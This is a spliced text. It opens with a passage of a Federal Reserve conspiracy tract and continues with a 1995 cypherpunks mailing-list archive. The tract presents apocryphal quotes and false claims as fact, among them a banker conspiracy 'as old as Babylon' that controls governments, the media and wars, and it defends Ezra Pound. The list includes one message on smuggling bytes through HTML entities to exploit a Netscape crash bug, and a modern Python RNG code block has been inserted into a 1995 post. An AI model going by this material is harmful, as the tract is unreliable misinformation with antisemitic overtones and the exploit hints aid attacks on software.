homes, their farms, their businesses, and perhaps even their watches,
rings, and the shirts off their backs!

   Sir Josiah Stamp, President of the Bank of England in the 1920s, and
the second richest man in Britain at the time, said:
   "Banking was conceived in iniquity and was born in sin. The bankers
own the earth. Take it away from them but leave them in power to create
deposits, and with the flick of the pen they create enough deposits to
buy it back again. However, take it away from them, and all the great
fortunes like mine will disappear, and they ought to disappear, for this
would be a happier and better world to live in. But, if you wish to re-
main the slaves of bankers and pay the cost of your own slavery, let
them continue to create deposits."

   Our real-life situation is much worse than any poker game. In a poker
game no one is forced to go into debt, and anyone can quit at any time
and keep whatever he or she still has. But in real life, even if we borrow
little ourselves from the bankers, the local, state, and federal govern-
ments borrow billions in our name, squander it, then confiscate our earn-
ings from us and pay it to the bankers with interest. We are forced to
play their game, and it seems we can only leave the game by dying. We
pay as long as we live, and our children pay after we die. If we cannot
pay, the same government sends the police to take our property and give
it to the bankers. The bankers risk nothing (at least, the Federal
Reserve bankers) in the game; they just collect their percentage and "win
it all." In Las Vegas all the games are "rigged" to pay the house (owner)
a percentage. They rake in millions. The Federal Reserve bankers' "game"
is similarly rigged, and it pays off in billions.

   In recent years bankers have added more "cards" to their game.
"Credit" cards are promoted as a convenience and a great boon to trade.
Actually, they are ingenious devices by which bankers collect 2% to 5%
of every retail sale from the seller and 18% or more interest from buy-
ers. A real stacked deck!

              POLITICIANS AND BANKERS IN THE SAME LEAGUE

   Democrat, Republican, and Independent voters have wondered why poli-
ticians always spend more tax currency than they collect. The reason
should now be clear. When you study our "debt-currency" system, you soon
realize that the politicians are not the agents of the people. They are
the agents of the Federal Reserve Bankers, for whom they plan ways to
place the people further in debt. Let me again quote the words of Senator
John Danforth:
   "I have never seen more senators express discontent with their jobs...
I think the major cause is that, deep down in our hearts, we have been
accomplices to doing something terrible and unforgivable to this wonder-
ful country. Deep down in our hearts, we know that we have bankrupted
America and that we have given our children a legacy of bankruptcy....
We have defrauded our country to get ourselves elected."

   Article 1, Section 8 of the U.S. Constitution states, "The Congress
shall have power... to coin money, regulate the value thereof..." But what
have our politicians done? In 1913 they traitorously gave the U.S. Treasury
to the Federal Reserve bankers - lock, stock, and barrel! Someone recently
asked, "What's the difference between Kindergarten and Congress?" Answer:
"One has adult supervision!" Actually, we shouldn't criticize Congress,
after all, we have the best Congress money can buy. Chapter Ten examines
Congress in more detail.

                    FEDERAL RESERVE SYSTEM AUDIT

   The Federal Reserve has never been audited by the government. In 1975
a bill H.R. 4316, to require Federal Reserve audits, was introduced in
Congress. Due to pressure from the currency-controllers, it was rejected.
No audit of the Federal Reserve has ever been done.

                       MOUNTING DEBTS AND WARS

   We, as a people are now ruled by a "banker-owned system" that has
usurped the mantle of government, disguised itself as our legitimate
government, and set about to pauperize and control the people. It is now
a centralized, all-powerful apparatus whose main purposes are spending the
people's currency, promoting war, and propagandizing to perpetuate itself
in power. Our two large political parties (the "Demopublicans" also call-
ed "Republicrats") have become its servants, the various departments of
government its spending agencies, and the Internal Revenue Service its
collection agency.

   Unknown to the people, our "banker-owned system" operates in close
cooperation with similar apparatuses in other nations, also disguised as
"governments." Some, we are told, are friends. Others, we are told, are
enemies. "Enemies" are built up through international manipulations and
used to frighten the American people into going billions of dollars more
into debt to the bankers for "military preparedness," "foreign aid to
stop communism," "minority rights," etc. Citizens, deliberately confused
by brainwashing propaganda, watch helplessly while our politicians give
our food, goods, and gold to banker-controlled alien governments under the
guise of "better relations," "easing tensions," or "humanitarian aid."
Our banker-controlled government takes our finest and bravest sons and
sends them into foreign wars, where tens of thousands are murdered and
hundreds of thousands are crippled. Other thousands are morally corrupted
and addicted to drugs. When the "war" is over we have gained nothing, but
we are scores of billions more in debt to the bankers - which was the real
reason for the war in the first place!

                   MORE THAN JUST ECONOMIC RAPE

   The profits from these massive debts have been used to erect a com-
plete and almost hidden economic and political colossus over our nation.
Our "banker-owned system" keeps telling us they are trying to do us good,
when in truth they work to harm and injure the people. These would-be
despots know it is easier to control and rob an ignorant, poorly-educated,
and confused people than it is an informed population, so they deliber-
ately degrade our educational systems. For the same reason they secretly
favor drug use, alcohol, racial conflict, and crime in general. Their "war
on drugs," as an example, only produces more drug use and a host of relat-
ed crimes. Everything which debilitates the minds and bodies of the people
is secretly encouraged, as it makes the people less able to oppose them,
or even to understand what is being done to them. The system wants medio-
cre, unthinking, helpless "sheople."

   Family, morals, and all that is honorable is being swept away, while
our "banker-owned system" builds their new subservient man, the found-
ation of their "new world order." Our new rulers are trying to change our
whole political, social, and racial order, but they will not change the
debt-currency economic system by which they rob and rule. Our people have
become tenants and "debt-slaves" to the bankers and their agents in the
land our fathers conquered. It is conquest through the most gigantic
fraud and swindle in the history of humankind. And we remind you again:
The key to their wealth and power over us is their MONOPOLISTIC ability
to "create" currency out of nothing and to lend it to us at interest. If
Congress had not allowed them to do that, they never would have gained
secret control over our nation.

                   CONTROLLED NEWS AND INFORMATION

   This currency-lender conspiracy ("consPIRACY") is as old as Babylon.
Even in America it dates far back before 1913. Actually, 1913 was the
year in which the way opened for complete economic conquest of our peo-
ple. The conspiracy is old enough to America so that the system's agents
have been for many years in positions such as newspaper publishers, edi-
tors, columnists, church ministers, university presidents, professors,
textbook authors, attorneys, accountants, labor union leaders, movie mak-
ers, radio and TV commentators, politicians from school board members to
U.S. Presidents, and many others.

   These agents control the information available to our people. They
manipulate public opinion, elect who they will locally and nationally,
and never expose the crooked currency system. They promote school bonds,
municipal bonds, expensive and detrimental farm programs, "urban renew-
al," "foreign aid," and many other schemes which will put the people more
in debt to the bankers. Thoughtful citizens wonder why billions are spent
on one program and billions on another which may duplicate or even null-
ify it, such as paying some farmers not to raise crops, while at the same
time building dams or canals to irrigate more farm land. Crazy or stupid?
Neither. The goal is more debt. Thousands of government-sponsored ways to
waste "money" are perpetrated continually. Most make no sense, but they
are never exposed for what they really are: builders of billions for the
bankers and debts for the people.

   So-called "economic experts" write syndicated columns in hundreds of
newspapers, craftily designed to prevent the people from learning the
simple truth about our debt-currency system. Commentators on radio and
TV, educators, and politicians blame the people as wasteful, lazy, or
spendthrift, and blame the workers and consumers for the increase in
debts and the inflation of prices, when they really know that the basic
cause is the debt-currency system itself. Our people are drowned in char-
ges and counter-charges designed to confuse them and keep them from under-
standing the evil currency system that so silently robs the workers, farm-
ers, and business people of the fruit of their labor. And, increasingly,
the system is being used to rob us of our rights and freedoms, supposedly
guaranteed by the U.S. Constitution.

   In his book INVENTING REALITY,  Michael Parenti wrote:
   "Ten business and financial corporations control the three major tele-
vision and radio networks (NBC, CBS, ABC), 34 subsidiary television stat-
ions, 201 cable TV systems, 62 radio stations, 20 record companies, 59
magazines, 58 newspapers, including the NEW YORK TIMES, the WASHINGTON
POST, THE WALL STREET JOURNAL, and the LOS ANGELES TIMES, 41 book pub-
lishers and various motion picture companies like Columbia Pictures and
Twentieth Century Fox. Three quarters of the major stockholders of ABC,
CBS and NBC are banks, such as Chase Manhattan, Morgan Guaranty Trust,
Citibank, and Bank of America.
   The overall pattern is one of increasing concentration of ownership
and earnings. According to a 1982 LOS ANGELES TIMES survey, independent
daily newspapers are being gobbled up by the chains at the rate of fifty
or sixty a year. Ten newspaper chains earn over half of all newspaper rev-
enue in this country. Five media conglomerates share 95 percent of the
record and tapes market with Warner and CBS alone controlling 65 percent
of the market. Eight Hollywood studios account for 89 percent of U.S.
feature film rentals. Three television networks earn over two-thirds of
total U.S. television revenues. Seven paperback publishers dominate the
mass market for books...
   While having an abundance of numbers and giving an appearance of di-
versity, the mass media actually are highly centralized outlets that
proffer a remarkably homogenized fare. News services for dailies through-
out the entire nation are provided by the Associated Press and United
Press International (which may soon merge with AP or go under), The New
York Times-Washington Post wire services, and several foreign wire ser-
vices like Reuters. The ideological viewpoint of these news conduits are
pretty much the same, marked by prefabricated standardization of news
which is constricting and frightening."

   In his book THE MEDIA MONOPOLY, Ben H. Bagdikian writes:
"The power to control information is a major lever in the control of
society. Giving citizens a choice in ideas and information is as impor-
tant as giving them a choice in politics. If a nation has narrowly con-
trolled information it will soon have narrowly controlled politics."

   When a few informed and concerned people or organizations who know the
truth begin to expose the bankers and their agents, or try to stop any of
their mad schemes, the messengers are ridiculed and smeared as "right-
wing extremists," "super-patriots," "bigots," "racists," "fascists," or
"antisemites." Any name is used to discredit them, and to stop other peo-
ple from listening. Books and articles such as you are now reading are
kept out of schools, libraries, and book stores.

   Some, who are especially vocal in their exposure of the treason com-
mitted against our people, are harassed by government agencies such as
the IRS, FDA, EPA, OSHA, and others, causing them financial loss or bank-
ruptcy. Sometimes their businesses and homes are violently raided at gun-
point, and their money, currency, equipment, and records confiscated, so
it is very difficult, if at all possible, to continue their business. In
Chapter One the National Commodity and Barter Association was mentioned as
an example of such raids. But the most striking case has been that of Ezra
Pound, which is covered below.

   Using these methods, the Federal Reserve bankers and their agents have
been completely successful in preventing most Americans from learning the
things you are reading in this report. However, in spite of their control
of information, they realize that more and more citizens are learning the
truth. Therefore, to prevent retaliation and armed resistance to their
plunder of America, they plan to register all firearms and eventually
disarm all citizens. They want to eliminate all guns not in the hands of
their government police or army. Our wise Founding Fathers wrote the Se-
cond Amendment to the Constitution so that the people could protect them-
selves against the government.

   Love of life, interest in your freedom, compassion for humanity, con-
cern for your children, and the safety of all you have worked for should
make you deeply interested in this, America's greatest problem. Our gener-
ation has not suffered under the bankers' yoke as the coming generations
will. Usury and taxes will continue to take a larger and larger part of
the earnings of the people and put them deeper into the pockets of the
bankers and their agents. Increasing "government" regulations will prevent citizen
protest and opposition to their control. Is it possible that your
grandchildren will own neither car nor home, but will live in
"government-owned" apartments and ride to work in "government-owned" buses, and be
allowed to keep just enough of their earnings to buy a minimum of food and
clothing, while their rulers wallow in luxury? In Asia and Eastern Europe
this used to be called communism. In America it is called democracy or
capitalism.

   Horace Greeley stated, "While boasting of our noble deeds, we are
careful to conceal the ugly fact that by an iniquitous currency system
we have nationalized a system of oppression which, though more refined, is
no less cruel than the old system of chattel slavery."

                     THE CASE OF EZRA POUND

   Ezra Pound was a poet, one of America's greatest - if not the great-
est. He played a major role in the development of writers and poets, such
as E.E. Cummings, T.S. Eliot, Robert Frost, Ernest Hemingway, James Joyce,
and William Carlos Williams. He also studied politics, economics, banking,
and monetary theory. He disapproved of war. During World War II, he hid a
number of Jews from the Nazi exterminators; if discovered the penalty
would have been death. He broadcast a series of talks on Italian radio
aimed at Americans. He had wanted America to stay out of the war, and he
said some uncomplimentary things about President Franklin D. Roosevelt. He
also stated some of his political and monetary ideas. He was accused of
being a traitor. At the end of the war he was imprisoned in an American
concentration camp near Pisa, Italy for six months without trial. Then he
was transferred to America where he was declared insane and imprisoned in
a mental hospital in Washington D.C. for thirteen years. After which the
treason charges, for which he had never stood trial, were dropped, and he
was released. He returned to Italy, where he lived until his death in
1972.

   The reason he was not tried seems to be that his prosecutors didn't
have a case that would hold up in court and/or they were afraid that he
would repeat in court what he had said over the radio in Italy. Wendell
Muncie, M.D., one of the psychiatrists involved in his "sanity hearing,"
said that Pound's insanity consisted of three factors: his passion for the
U.S. Constitution, his espousal of the Confucian ethic, and his desire for
world peace. No formal diagnosis of Pound's supposed "insanity" has been
found. His captors in Washington openly admitted that Pound was a polit-
ical prisoner. A Congressional investigation started in 1957 and completed
in 1958 exposed the inadequacy of the case against Pound and led to his
release.
   Here are some extracts from Pound's radio talks:
."I think an alliance with Stalin's Russia is rotten." (January 29, 1942)
."Liberty is not a right but a duty." (March 8, 1942)
."Sovereignty inheres in the right to issue money. And the American
sovereignty belongs by right to the people, and their representatives in
Congress have the right to issue money and to determine the value thereof.
And 120 million, 120 million suckers have lamentably failed to insist on
the observation of this quite decided law.... Now the point at which
embezzlement of the nation's funds on the part of her officers becomes
treason can probably be decided only by jurists, and not by hand-picked judges
who support illegality." (April 9, 1942)
.Quotes read by Pound: 1. "'I believe that banking institutions are more
dangerous to our liberties than standing armies.' - Thomas Jefferson.
2. 'I have two great enemies, the southern army in front of me and the
financial institutions in the rear. Of the two, the one in the rear is the
greatest enemy.' - Abraham Lincoln.
3. 'The money power preys upon the nation in times of peace and conspires
against it in times of adversity. It is more despotic than monarchy, more
insolent than autocracy, more selfish than bureaucracy; it denounces as
public enemies all who question its methods, or throw light upon its
crimes.' - William Jennings Bryan." (July 26, 1942)
.Back to Pound's own words: "Wars in old times were made to get slaves.
The modern implement of imposing slavery is debt." (March 25, 1943)
."The phase of the usury system which we are trying to analyze is more or
less Patterson's perception that the Bank of England could have benefit
of all the interest on all the money that it creates out of nothing....
Now the American citizen can, of course, appeal to his constitution, which
states that Congress shall have power to coin money or regulate the value
thereof and of foreign coin. Such appeal is perhaps quixotic." (March 30,
1943)
."That text is known to them that have the patience to read it, possibly
one-hundredth of one percent of the denizens. They forget it, all save
a few Western states. I think somebody in Dakota once read it. The
Constitution." (June 30, 1943)

       THE FEDERAL RESERVE SYSTEM IS UNCONSTITUTIONAL AND ILLEGAL

   Although there has never been a court case that challenged the legal-
ity of the Federal Reserve System, there was a challenge to the National
Recovery Act or NRA, which was ruled unconstitutional. The U.S. Supreme
Court - Schechter Poultry v. U.S., 29 U.S. 495, 55 U.S. 837.842 (1935) -
ruled that, "Congress may not ABDICATE OR TRANSFER TO OTHERS ITS LEGITI-
MATE FUNCTIONS.." Article I, Section 8 of the U.S. Constitution states,
"The Congress shall have power... to coin money, regulate the value there-
of..." By passing the Federal Reserve Act, Congress abdicated and trans-
ferred to the Federal Reserve bankers its constitutionally legitimate
function of issuing and controlling money. If the Supreme Court ruling on
the NRA is applied to the Federal Reserve System, the unconstitutionality
and illegality of the Fed becomes obvious.

                        TELL THE PEOPLE

   America will not shake off her illegal banker-controlled dictatorship
as long as the people are ignorant of the hidden controllers. Interna-
tional bankers, who control most of the governments of the nations and
most sources of information, seem to have us completely in their grasp.
They are afraid of only one thing: an awakened citizenry armed with the
truth. An ignorant citizen is the banker-government's best "client." An
informed citizen is the banker-government's worst nightmare.

   Robert H. Hemphill, Credit Manager of the Federal Reserve Bank of At-
lanta Georgia, said:
   "This is a staggering thought. We are completely dependent on the com-
mercial banks. Someone has to borrow every dollar we have in circulation,
cash, or credit. If the banks create ample synthetic money, we are pros-
perous; if not, we starve. We are absolutely without a permanent money
system. When one gets a complete grasp of the picture, the tragic absur-
dity of our hopeless position is almost incredible, but there it is. It
is the most important subject intelligent persons can investigate and re-
flect upon. It is so important that our present civilization may collapse
unless it becomes widely understood and the defect remedied very soon."

                        PRIVATE BANKING

   In California a very private "non-bank" has been operating successfully
for fifteen years. It caters for accounts in gold or Federal Reserve
Notes. It is completely private and doesn't report to anyone. It pays in-
terest on both gold and Federal Reserve Note balances. Ideally, we need to
establish a network of private banks throughout the country, and even-
tually throughout the rest of the world. See Chapter Twelve.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 28 Sep 95 05:08:27 PDT
To: cypherpunks@toad.com
Subject: STT_???
Message-ID: <199509281208.IAA06190@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-28-95. W$Japer:


   "Infighting Unravels Alliance Seeking Standard to Protect
   Internet Purchases."

      The consortium brought together such top players as
      credit-card rivals Visa International and MasterCard
      International Inc., software titan Microsoft Corp. and
      Internet upstart Netscape Communications Corp. But this
      week, the alliance split because of tensions between
      Visa and MasterCard and their respective technology
      partners -- Microsoft and Netscape.

      Regarding Netscape, Mr. Dent of Microsoft said the
      firm's security deficiencies that have recently come to
      light have "tainted" electronic commerce on the
      Internet. Mr. Dent also noted that Microsoft yesterday
      introduced new security technology, including means to
      verify a user's identity, that is much stronger than
      Netscape's.


   STT_???  (6 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Thu, 28 Sep 95 05:33:31 PDT
To: hallam@w3.org
Subject: Re: Hack Microsoft NT C2 Rating?
In-Reply-To: <9509272102.AA21900@zorch.w3.org>
Message-ID: <9509281232.AA02546@wombat.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


hallam@w3.org writes:

> I think that c2 is possibly the limit of orange/red bookishness that is 
> reasonable to work to. It is not a trivial level of security however, UNIX 
> despite all the claims has never been shipped as C2 secure as standard by a 
> mainstream vendor. Even requirements involving trivial effort but which are 
> extremely important such as the writing of a user's security guide have never
> been taken seriously on any of the UNIX platforms on which I have worked.

A slight correction: SCO shipped the C2 version of their Open
Desktop 1.1 as the standard (in fact, only) version a few years
back.  The howls of outrage from their customer base (due to the
non-standard-Unix behavior) caused them to back off in the next
major release.  Last time I tried to install their software, C2
had been made an option.  (Of course, AFAIK, they never actually
completed a C2 evaluation.)


-- Jeff



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 28 Sep 95 08:33:05 PDT
To: Travis Corcoran <cypherpunks@toad.com
Subject: Re: Timothy C. May: Mini-mailbombs and Warning Letters
Message-ID: <199509281532.IAA25269@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:28 PM 9/27/95 -0400, Travis Corcoran wrote:
>A question: in a situation like this one, where an individual signed a
>message with a key then did not make a key with the return address of
>his message available either through his .plan, or a keyserver (the two
>de facto standards), what next step -if any- do people think is more
>appropriate than sending mail to the individual asking them for a copy
>of the key ?

Keep up the good work.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 28 Sep 95 06:09:58 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Netscpae & Fortezza (Or, say it Ain't so, Jeff?)
Message-ID: <199509281309.JAA12017@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


This came across the SSL mailing list.  Anyone know Taher's position
on key-escrow?


| From ssl-talk-request@netscape.com  Thu Sep 28 01:54:10 1995
| Resent-Date: Tue, 26 Sep 1995 09:34:09 -0700
| Date: Tue, 26 Sep 1995 09:30:03 -0700
| Message-Id: <199509261630.JAA06021@neon.netscape.com>
| X-Sender: elgamal@pop.mcom.com
| X-Mailer: Windows Eudora Version 2.0.3
| Mime-Version: 1.0
| Content-Type: text/plain; charset="us-ascii"
| To: John Droge <jdroge@ix.netcom.com>, ssl-talk@netscape.com
| From: elgamal@netscape.com (Taher ElGamal)
| Subject: Re: Crypto
| Resent-Message-ID: <"BFRph1.0.yW1.jg2Qm"@neon>
| Resent-From: ssl-talk@netscape.com
| X-Mailing-List: <ssl-talk@netscape.com> archive/latest/987
| X-Loop: ssl-talk@netscape.com
| Precedence: list
| Resent-Sender: ssl-talk-request@netscape.com
| 
| Can I get some detailed info about your company and products-- We are
| thinking about this.
| 
| taher
| 
| At 11:34 PM 9/25/95 -0700, John Droge wrote:
| >Dear Sirs:
| >
| >My company developed and currently produces the Fortezza Crypto 
| >Card for the Government.  What plans do you have to support this
| >standard?
| >
| >Sincerely,
| >John Droge
| >Vice President
| >Program Development
| >Mykotronx, Inc.
| >357 Van Ness Way, Ste. 200
| >Torrance, CA  90501
| >(310) 533-8100
| >
| >
| >
| >
| >
| >
| Taher Elgamal                   elgamal@netscape.com
| Chief Scientist
| Netscape Comm Corp., 501 E Middlefield Road, Mountain View Ca 94043.
| (415) 528 2898 (Tel),          (415) 528 4122 (Fax)
|           
| 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjs@netcom.com (cjs)
Date: Thu, 28 Sep 95 09:18:28 PDT
To: cypherpunks@toad.com
Subject: Simple Hardware RNG Idea
Message-ID: <199509281615.JAA27355@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello all.

Someone mentioned this on IRC last night, and it sounded like a really
cool idea, so I thought I'd mention it.

The idea is to generate random numbers using a geiger counter tube and
a small portion of radioactive substance (like perhaps the stuff they
use in smoke detectors?) Would that be random enough?

I thought it was a neat idea anyway.

Christopher
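
An added example, not part of the original post: whether Geiger-tube pulses are "random enough" depends on how pulse times become bits, so this compares a fixed-threshold extractor with one that compares successive inter-pulse intervals. The detector is replaced by a constructed Poisson simulation; the function names, the 10 Hz and 3 Hz count rates and the 1 MHz timer are assumptions.

```python
import math
import random


def simulate_pulse_ticks(n_events, rate_hz, tick_hz, seed):
    """Constructed stand-in for the tube: Poisson arrivals read off a free-running timer."""
    rng = random.Random(seed)           # simulation only; real hardware supplies the pulses
    t = 0.0
    ticks = []
    for _ in range(n_events):
        t += rng.expovariate(rate_hz)   # exponential gap between decays
        ticks.append(int(t * tick_hz))  # the timer quantizes each arrival time
    return ticks


def intervals(ticks):
    """Gaps, in timer ticks, between consecutive pulses."""
    return [b - a for a, b in zip(ticks, ticks[1:])]


def median_threshold_ticks(rate_hz, tick_hz):
    """Median gap of a Poisson source with the given rate: ln(2) / rate."""
    return int(math.log(2) / rate_hz * tick_hz)


def bits_by_threshold(ticks, threshold_ticks):
    """Naive extractor: 1 if the gap exceeds a fixed threshold.

    Only unbiased while the count rate matches the one the threshold was
    calibrated for; source decay or tube ageing shifts the bias.
    """
    return [1 if gap > threshold_ticks else 0 for gap in intervals(ticks)]


def bits_by_interval_pairs(ticks):
    """Compare non-overlapping pairs of gaps; the result does not depend on the rate.

    Two independent gaps from the same source are equally likely to be
    ordered either way, so first > second is a fair coin. Ties (timer
    quantization, or a periodic non-radioactive signal) are discarded, and
    the sense of the comparison alternates to cancel slow systematic drift.
    """
    gaps = intervals(ticks)
    bits = []
    flip = 0
    for i in range(0, len(gaps) - 1, 2):
        first, second = gaps[i], gaps[i + 1]
        if first == second:
            continue
        bits.append((1 if first > second else 0) ^ flip)
        flip ^= 1
    return bits


def ones_fraction(bits):
    return sum(bits) / len(bits)


def monobit_z(bits):
    """Standard score of the ones count under the fair-coin hypothesis."""
    n = len(bits)
    return (2 * sum(bits) - n) / math.sqrt(n)


def healthy(bits, min_bits=1000, z_limit=4.0):
    """Coarse health check: enough output, and no gross bias."""
    if len(bits) < min_bits:
        return False                    # dead tube or periodic interference
    return abs(monobit_z(bits)) < z_limit


if __name__ == "__main__":
    tick_hz = 1_000_000
    threshold = median_threshold_ticks(10.0, tick_hz)   # calibrated for 10 Hz
    for label, rate, seed in (("10 Hz source", 10.0, 1995), ("3 Hz source", 3.0, 1996)):
        ticks = simulate_pulse_ticks(20001, rate, tick_hz, seed)
        naive = bits_by_threshold(ticks, threshold)
        paired = bits_by_interval_pairs(ticks)
        print(label,
              "threshold ones=%.3f" % ones_fraction(naive),
              "pairs ones=%.3f" % ones_fraction(paired),
              "pairs z=%.2f" % monobit_z(paired))
    periodic = [i * 1000 for i in range(101)]            # constructed: fixed-rate noise
    print("periodic input bits:", len(bits_by_interval_pairs(periodic)))
```

Passing a monobit check only rules out gross bias; output of this kind is normally conditioned with a cryptographic hash or mixed into an operating-system entropy pool rather than used raw.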
 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 28 Sep 95 06:15:39 PDT
To: cypherpunks@toad.com
Subject: 25 Crays a Year to Break STT
Message-ID: <199509281315.JAA11395@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Financial Times, September 28, 1995, p.1.


   Rivalry for Internet Security Grows

   By Louise Kehoe in San Francisco


   The Internet rivalry between Microsoft, the world's largest
   software company, and Netscape Communications increased
   yesterday when they announced competing encryption
   technology intended to ensure the security of financial
   transactions over the global computer network.

   Mr James Clark chairman of Netscape, the leading supplier
   of browser software that enables personal computer users to
   "surf" the Internet, also revealed the company had turned
   down a move by Microsoft to take a minority stake in
   Netscape earlier this year, before Netscape's public
   offering.

   Microsoft's encryption technology, developed with Visa
   International the credit card processing organisation, is
   intended to solve Internet security problems which have
   become a serious barrier to electronic commerce.

   Recent incidents, including the hacking of supposedly
   secure Internet software developed by Netscape, have
   heightened concerns about sending sensitive data such as
   credit card numbers over the Internet.

   Microsoft said its Secure Transaction Technology (STT), was
   designed to provide a much higher level of security for
   credit card transactions on the Internet. Netscape's
   general purpose encryption system uses a 40 or 128-bit
   electronic "key", while STT will use 2,000-bit keys.

   "By Christmas of 1996 you will be able to shop on the
   Internet to your heart's content, without even thinking
   about security," said Mr Warren Dent, Microsoft director of
   business development for consumer systems.

   Although no encryption system was totally secure, Mr Dent
   estimated it would take "25 Cray supercomputers a year" to
   break the STT codes.

   Netscape, however, said a new version of its Navigator
   software, which will become available next week will
   provide the same level of security. Netscape's "Secure
   Courier" technology has been developed in conjunction with
   MasterCard, Visa's credit card rival.

   To encourage widespread adoption of STT, Microsoft and Visa
   are making its technical specifications available at no
   charge to third parties to allow them to develop software.
   Netscape said Microsoft is expecting to charge transaction
   fees each time the STT technology is used.

   Commercial software products incorporating STT are expected
   to be available by April, Microsoft said. Netscape says
   Secure Courier will be available sooner.

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sherry Mayo <scmayo@rschp2.anu.edu.au>
Date: Wed, 27 Sep 95 16:18:40 PDT
To: cypherpunks@toad.com
Subject: re: chaos cryptography
Message-ID: <9509272318.AA20158@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Duh!

As someone pointed out to me in email I wrote "stenography" when
I meant "steganography" in the intro to the New Scientist article.
(Well I'm sure you all knew what I meant)

Sherry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 28 Sep 95 09:26:05 PDT
To: dl@hplyot.obspm.fr (Laurent Demailly)
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <9509281050.AA15525@hplyot.obspm.fr>
Message-ID: <199509281619.JAA24789@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> No, you *can* put 0x22, 0x3e and 0x2f by using respectively
> &#34; &#62; and &#47; html constructs  (&#nnn; nn decimal ascii code)
> unfortunately &#0; is not recognized but you can probably use any number
> subtracted by itself or even short lda#0 (depending on the cpu),...if
> you need a zero,...(what for ?)

	Oh that's great.. netscape might -not- be doing the conversion
before it crashes though.. worth a shot to check though, without a
doubt.

> 
> I hope this helps too, btw, anyone having contacts on the 8lgm folks?
> they must have experience with that kind of stuff...

	Karl told me that it's their policy only to do exploits for
bugs they have found themselves.

> Even if a patch should be available now, making a demonstration is
> still interesting IMO [specially when you know that there are still
> ppl around using netscape 0.9x beta, and even ppl 'selling' it in ISP
> access packages!...]

	Look at http://www.c2.org/ with an unpatched
netscape. Hopefully other sites will do similar things.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 28 Sep 95 09:26:20 PDT
To: jya@pipeline.com (John Young)
Subject: Re: STT_???
In-Reply-To: <199509281208.IAA06190@pipe4.nyc.pipeline.com>
Message-ID: <199509281621.JAA24930@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
>       Regarding Netscape, Mr. Dent of Microsoft said the
>       firm's security deficiencies that have recently come to
>       light have "tainted" electronic commerce on the
>       Internet. Mr. Dent also noted that Microsoft yesterday
>       introduced new security technology, including means to
>       verify a user's identity, that is much stronger than
>       Netscape's.

	Yeah. Right. I propose we show the world how Microsoft will
respond to security problems. I should have a tentative web page up by
later tonight.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 28 Sep 95 09:48:01 PDT
To: cypherpunks@toad.com
Subject: awards for hacking microsoft
Message-ID: <199509281642.JAA26140@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I've been working on putting together my hack microsoft
promotion and I need to think of a good low-budget award. T-shirts
would not be economically feasible -- I expect to be awarding many
microsoft awards.. Ideas would be appreciated. Thanks.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 28 Sep 95 10:39:49 PDT
To: cypherpunks@toad.com
Subject: Re: 25 Crays a Year to Break STT
Message-ID: <199509281737.KAA15655@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>   Microsoft said its Secure Transaction Technology (STT), was
>   designed to provide a much higher level of security for
>   credit card transactions on the Internet. Netscape's
>   general purpose encryption system uses a 40 or 128-bit
>   electronic "key", while STT will use 2,000-bit keys.
Sigh.  Apples and oranges, and they know it.
....
>   Although no encryption system was totally secure, Mr Dent
>   estimated it would take "25 Cray supercomputers a year" to
>   break the STT codes.

So how much work can 25 Crays do in a year?  Crack single-DES?
Maybe RC4/64?  
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 28 Sep 95 10:37:25 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape as vehicle for cypherpunk agenda/the cypherpunk bully pulpit
Message-ID: <199509281737.KAA15679@ix8.ix.netcom.com>
MIME-Version: 1.0
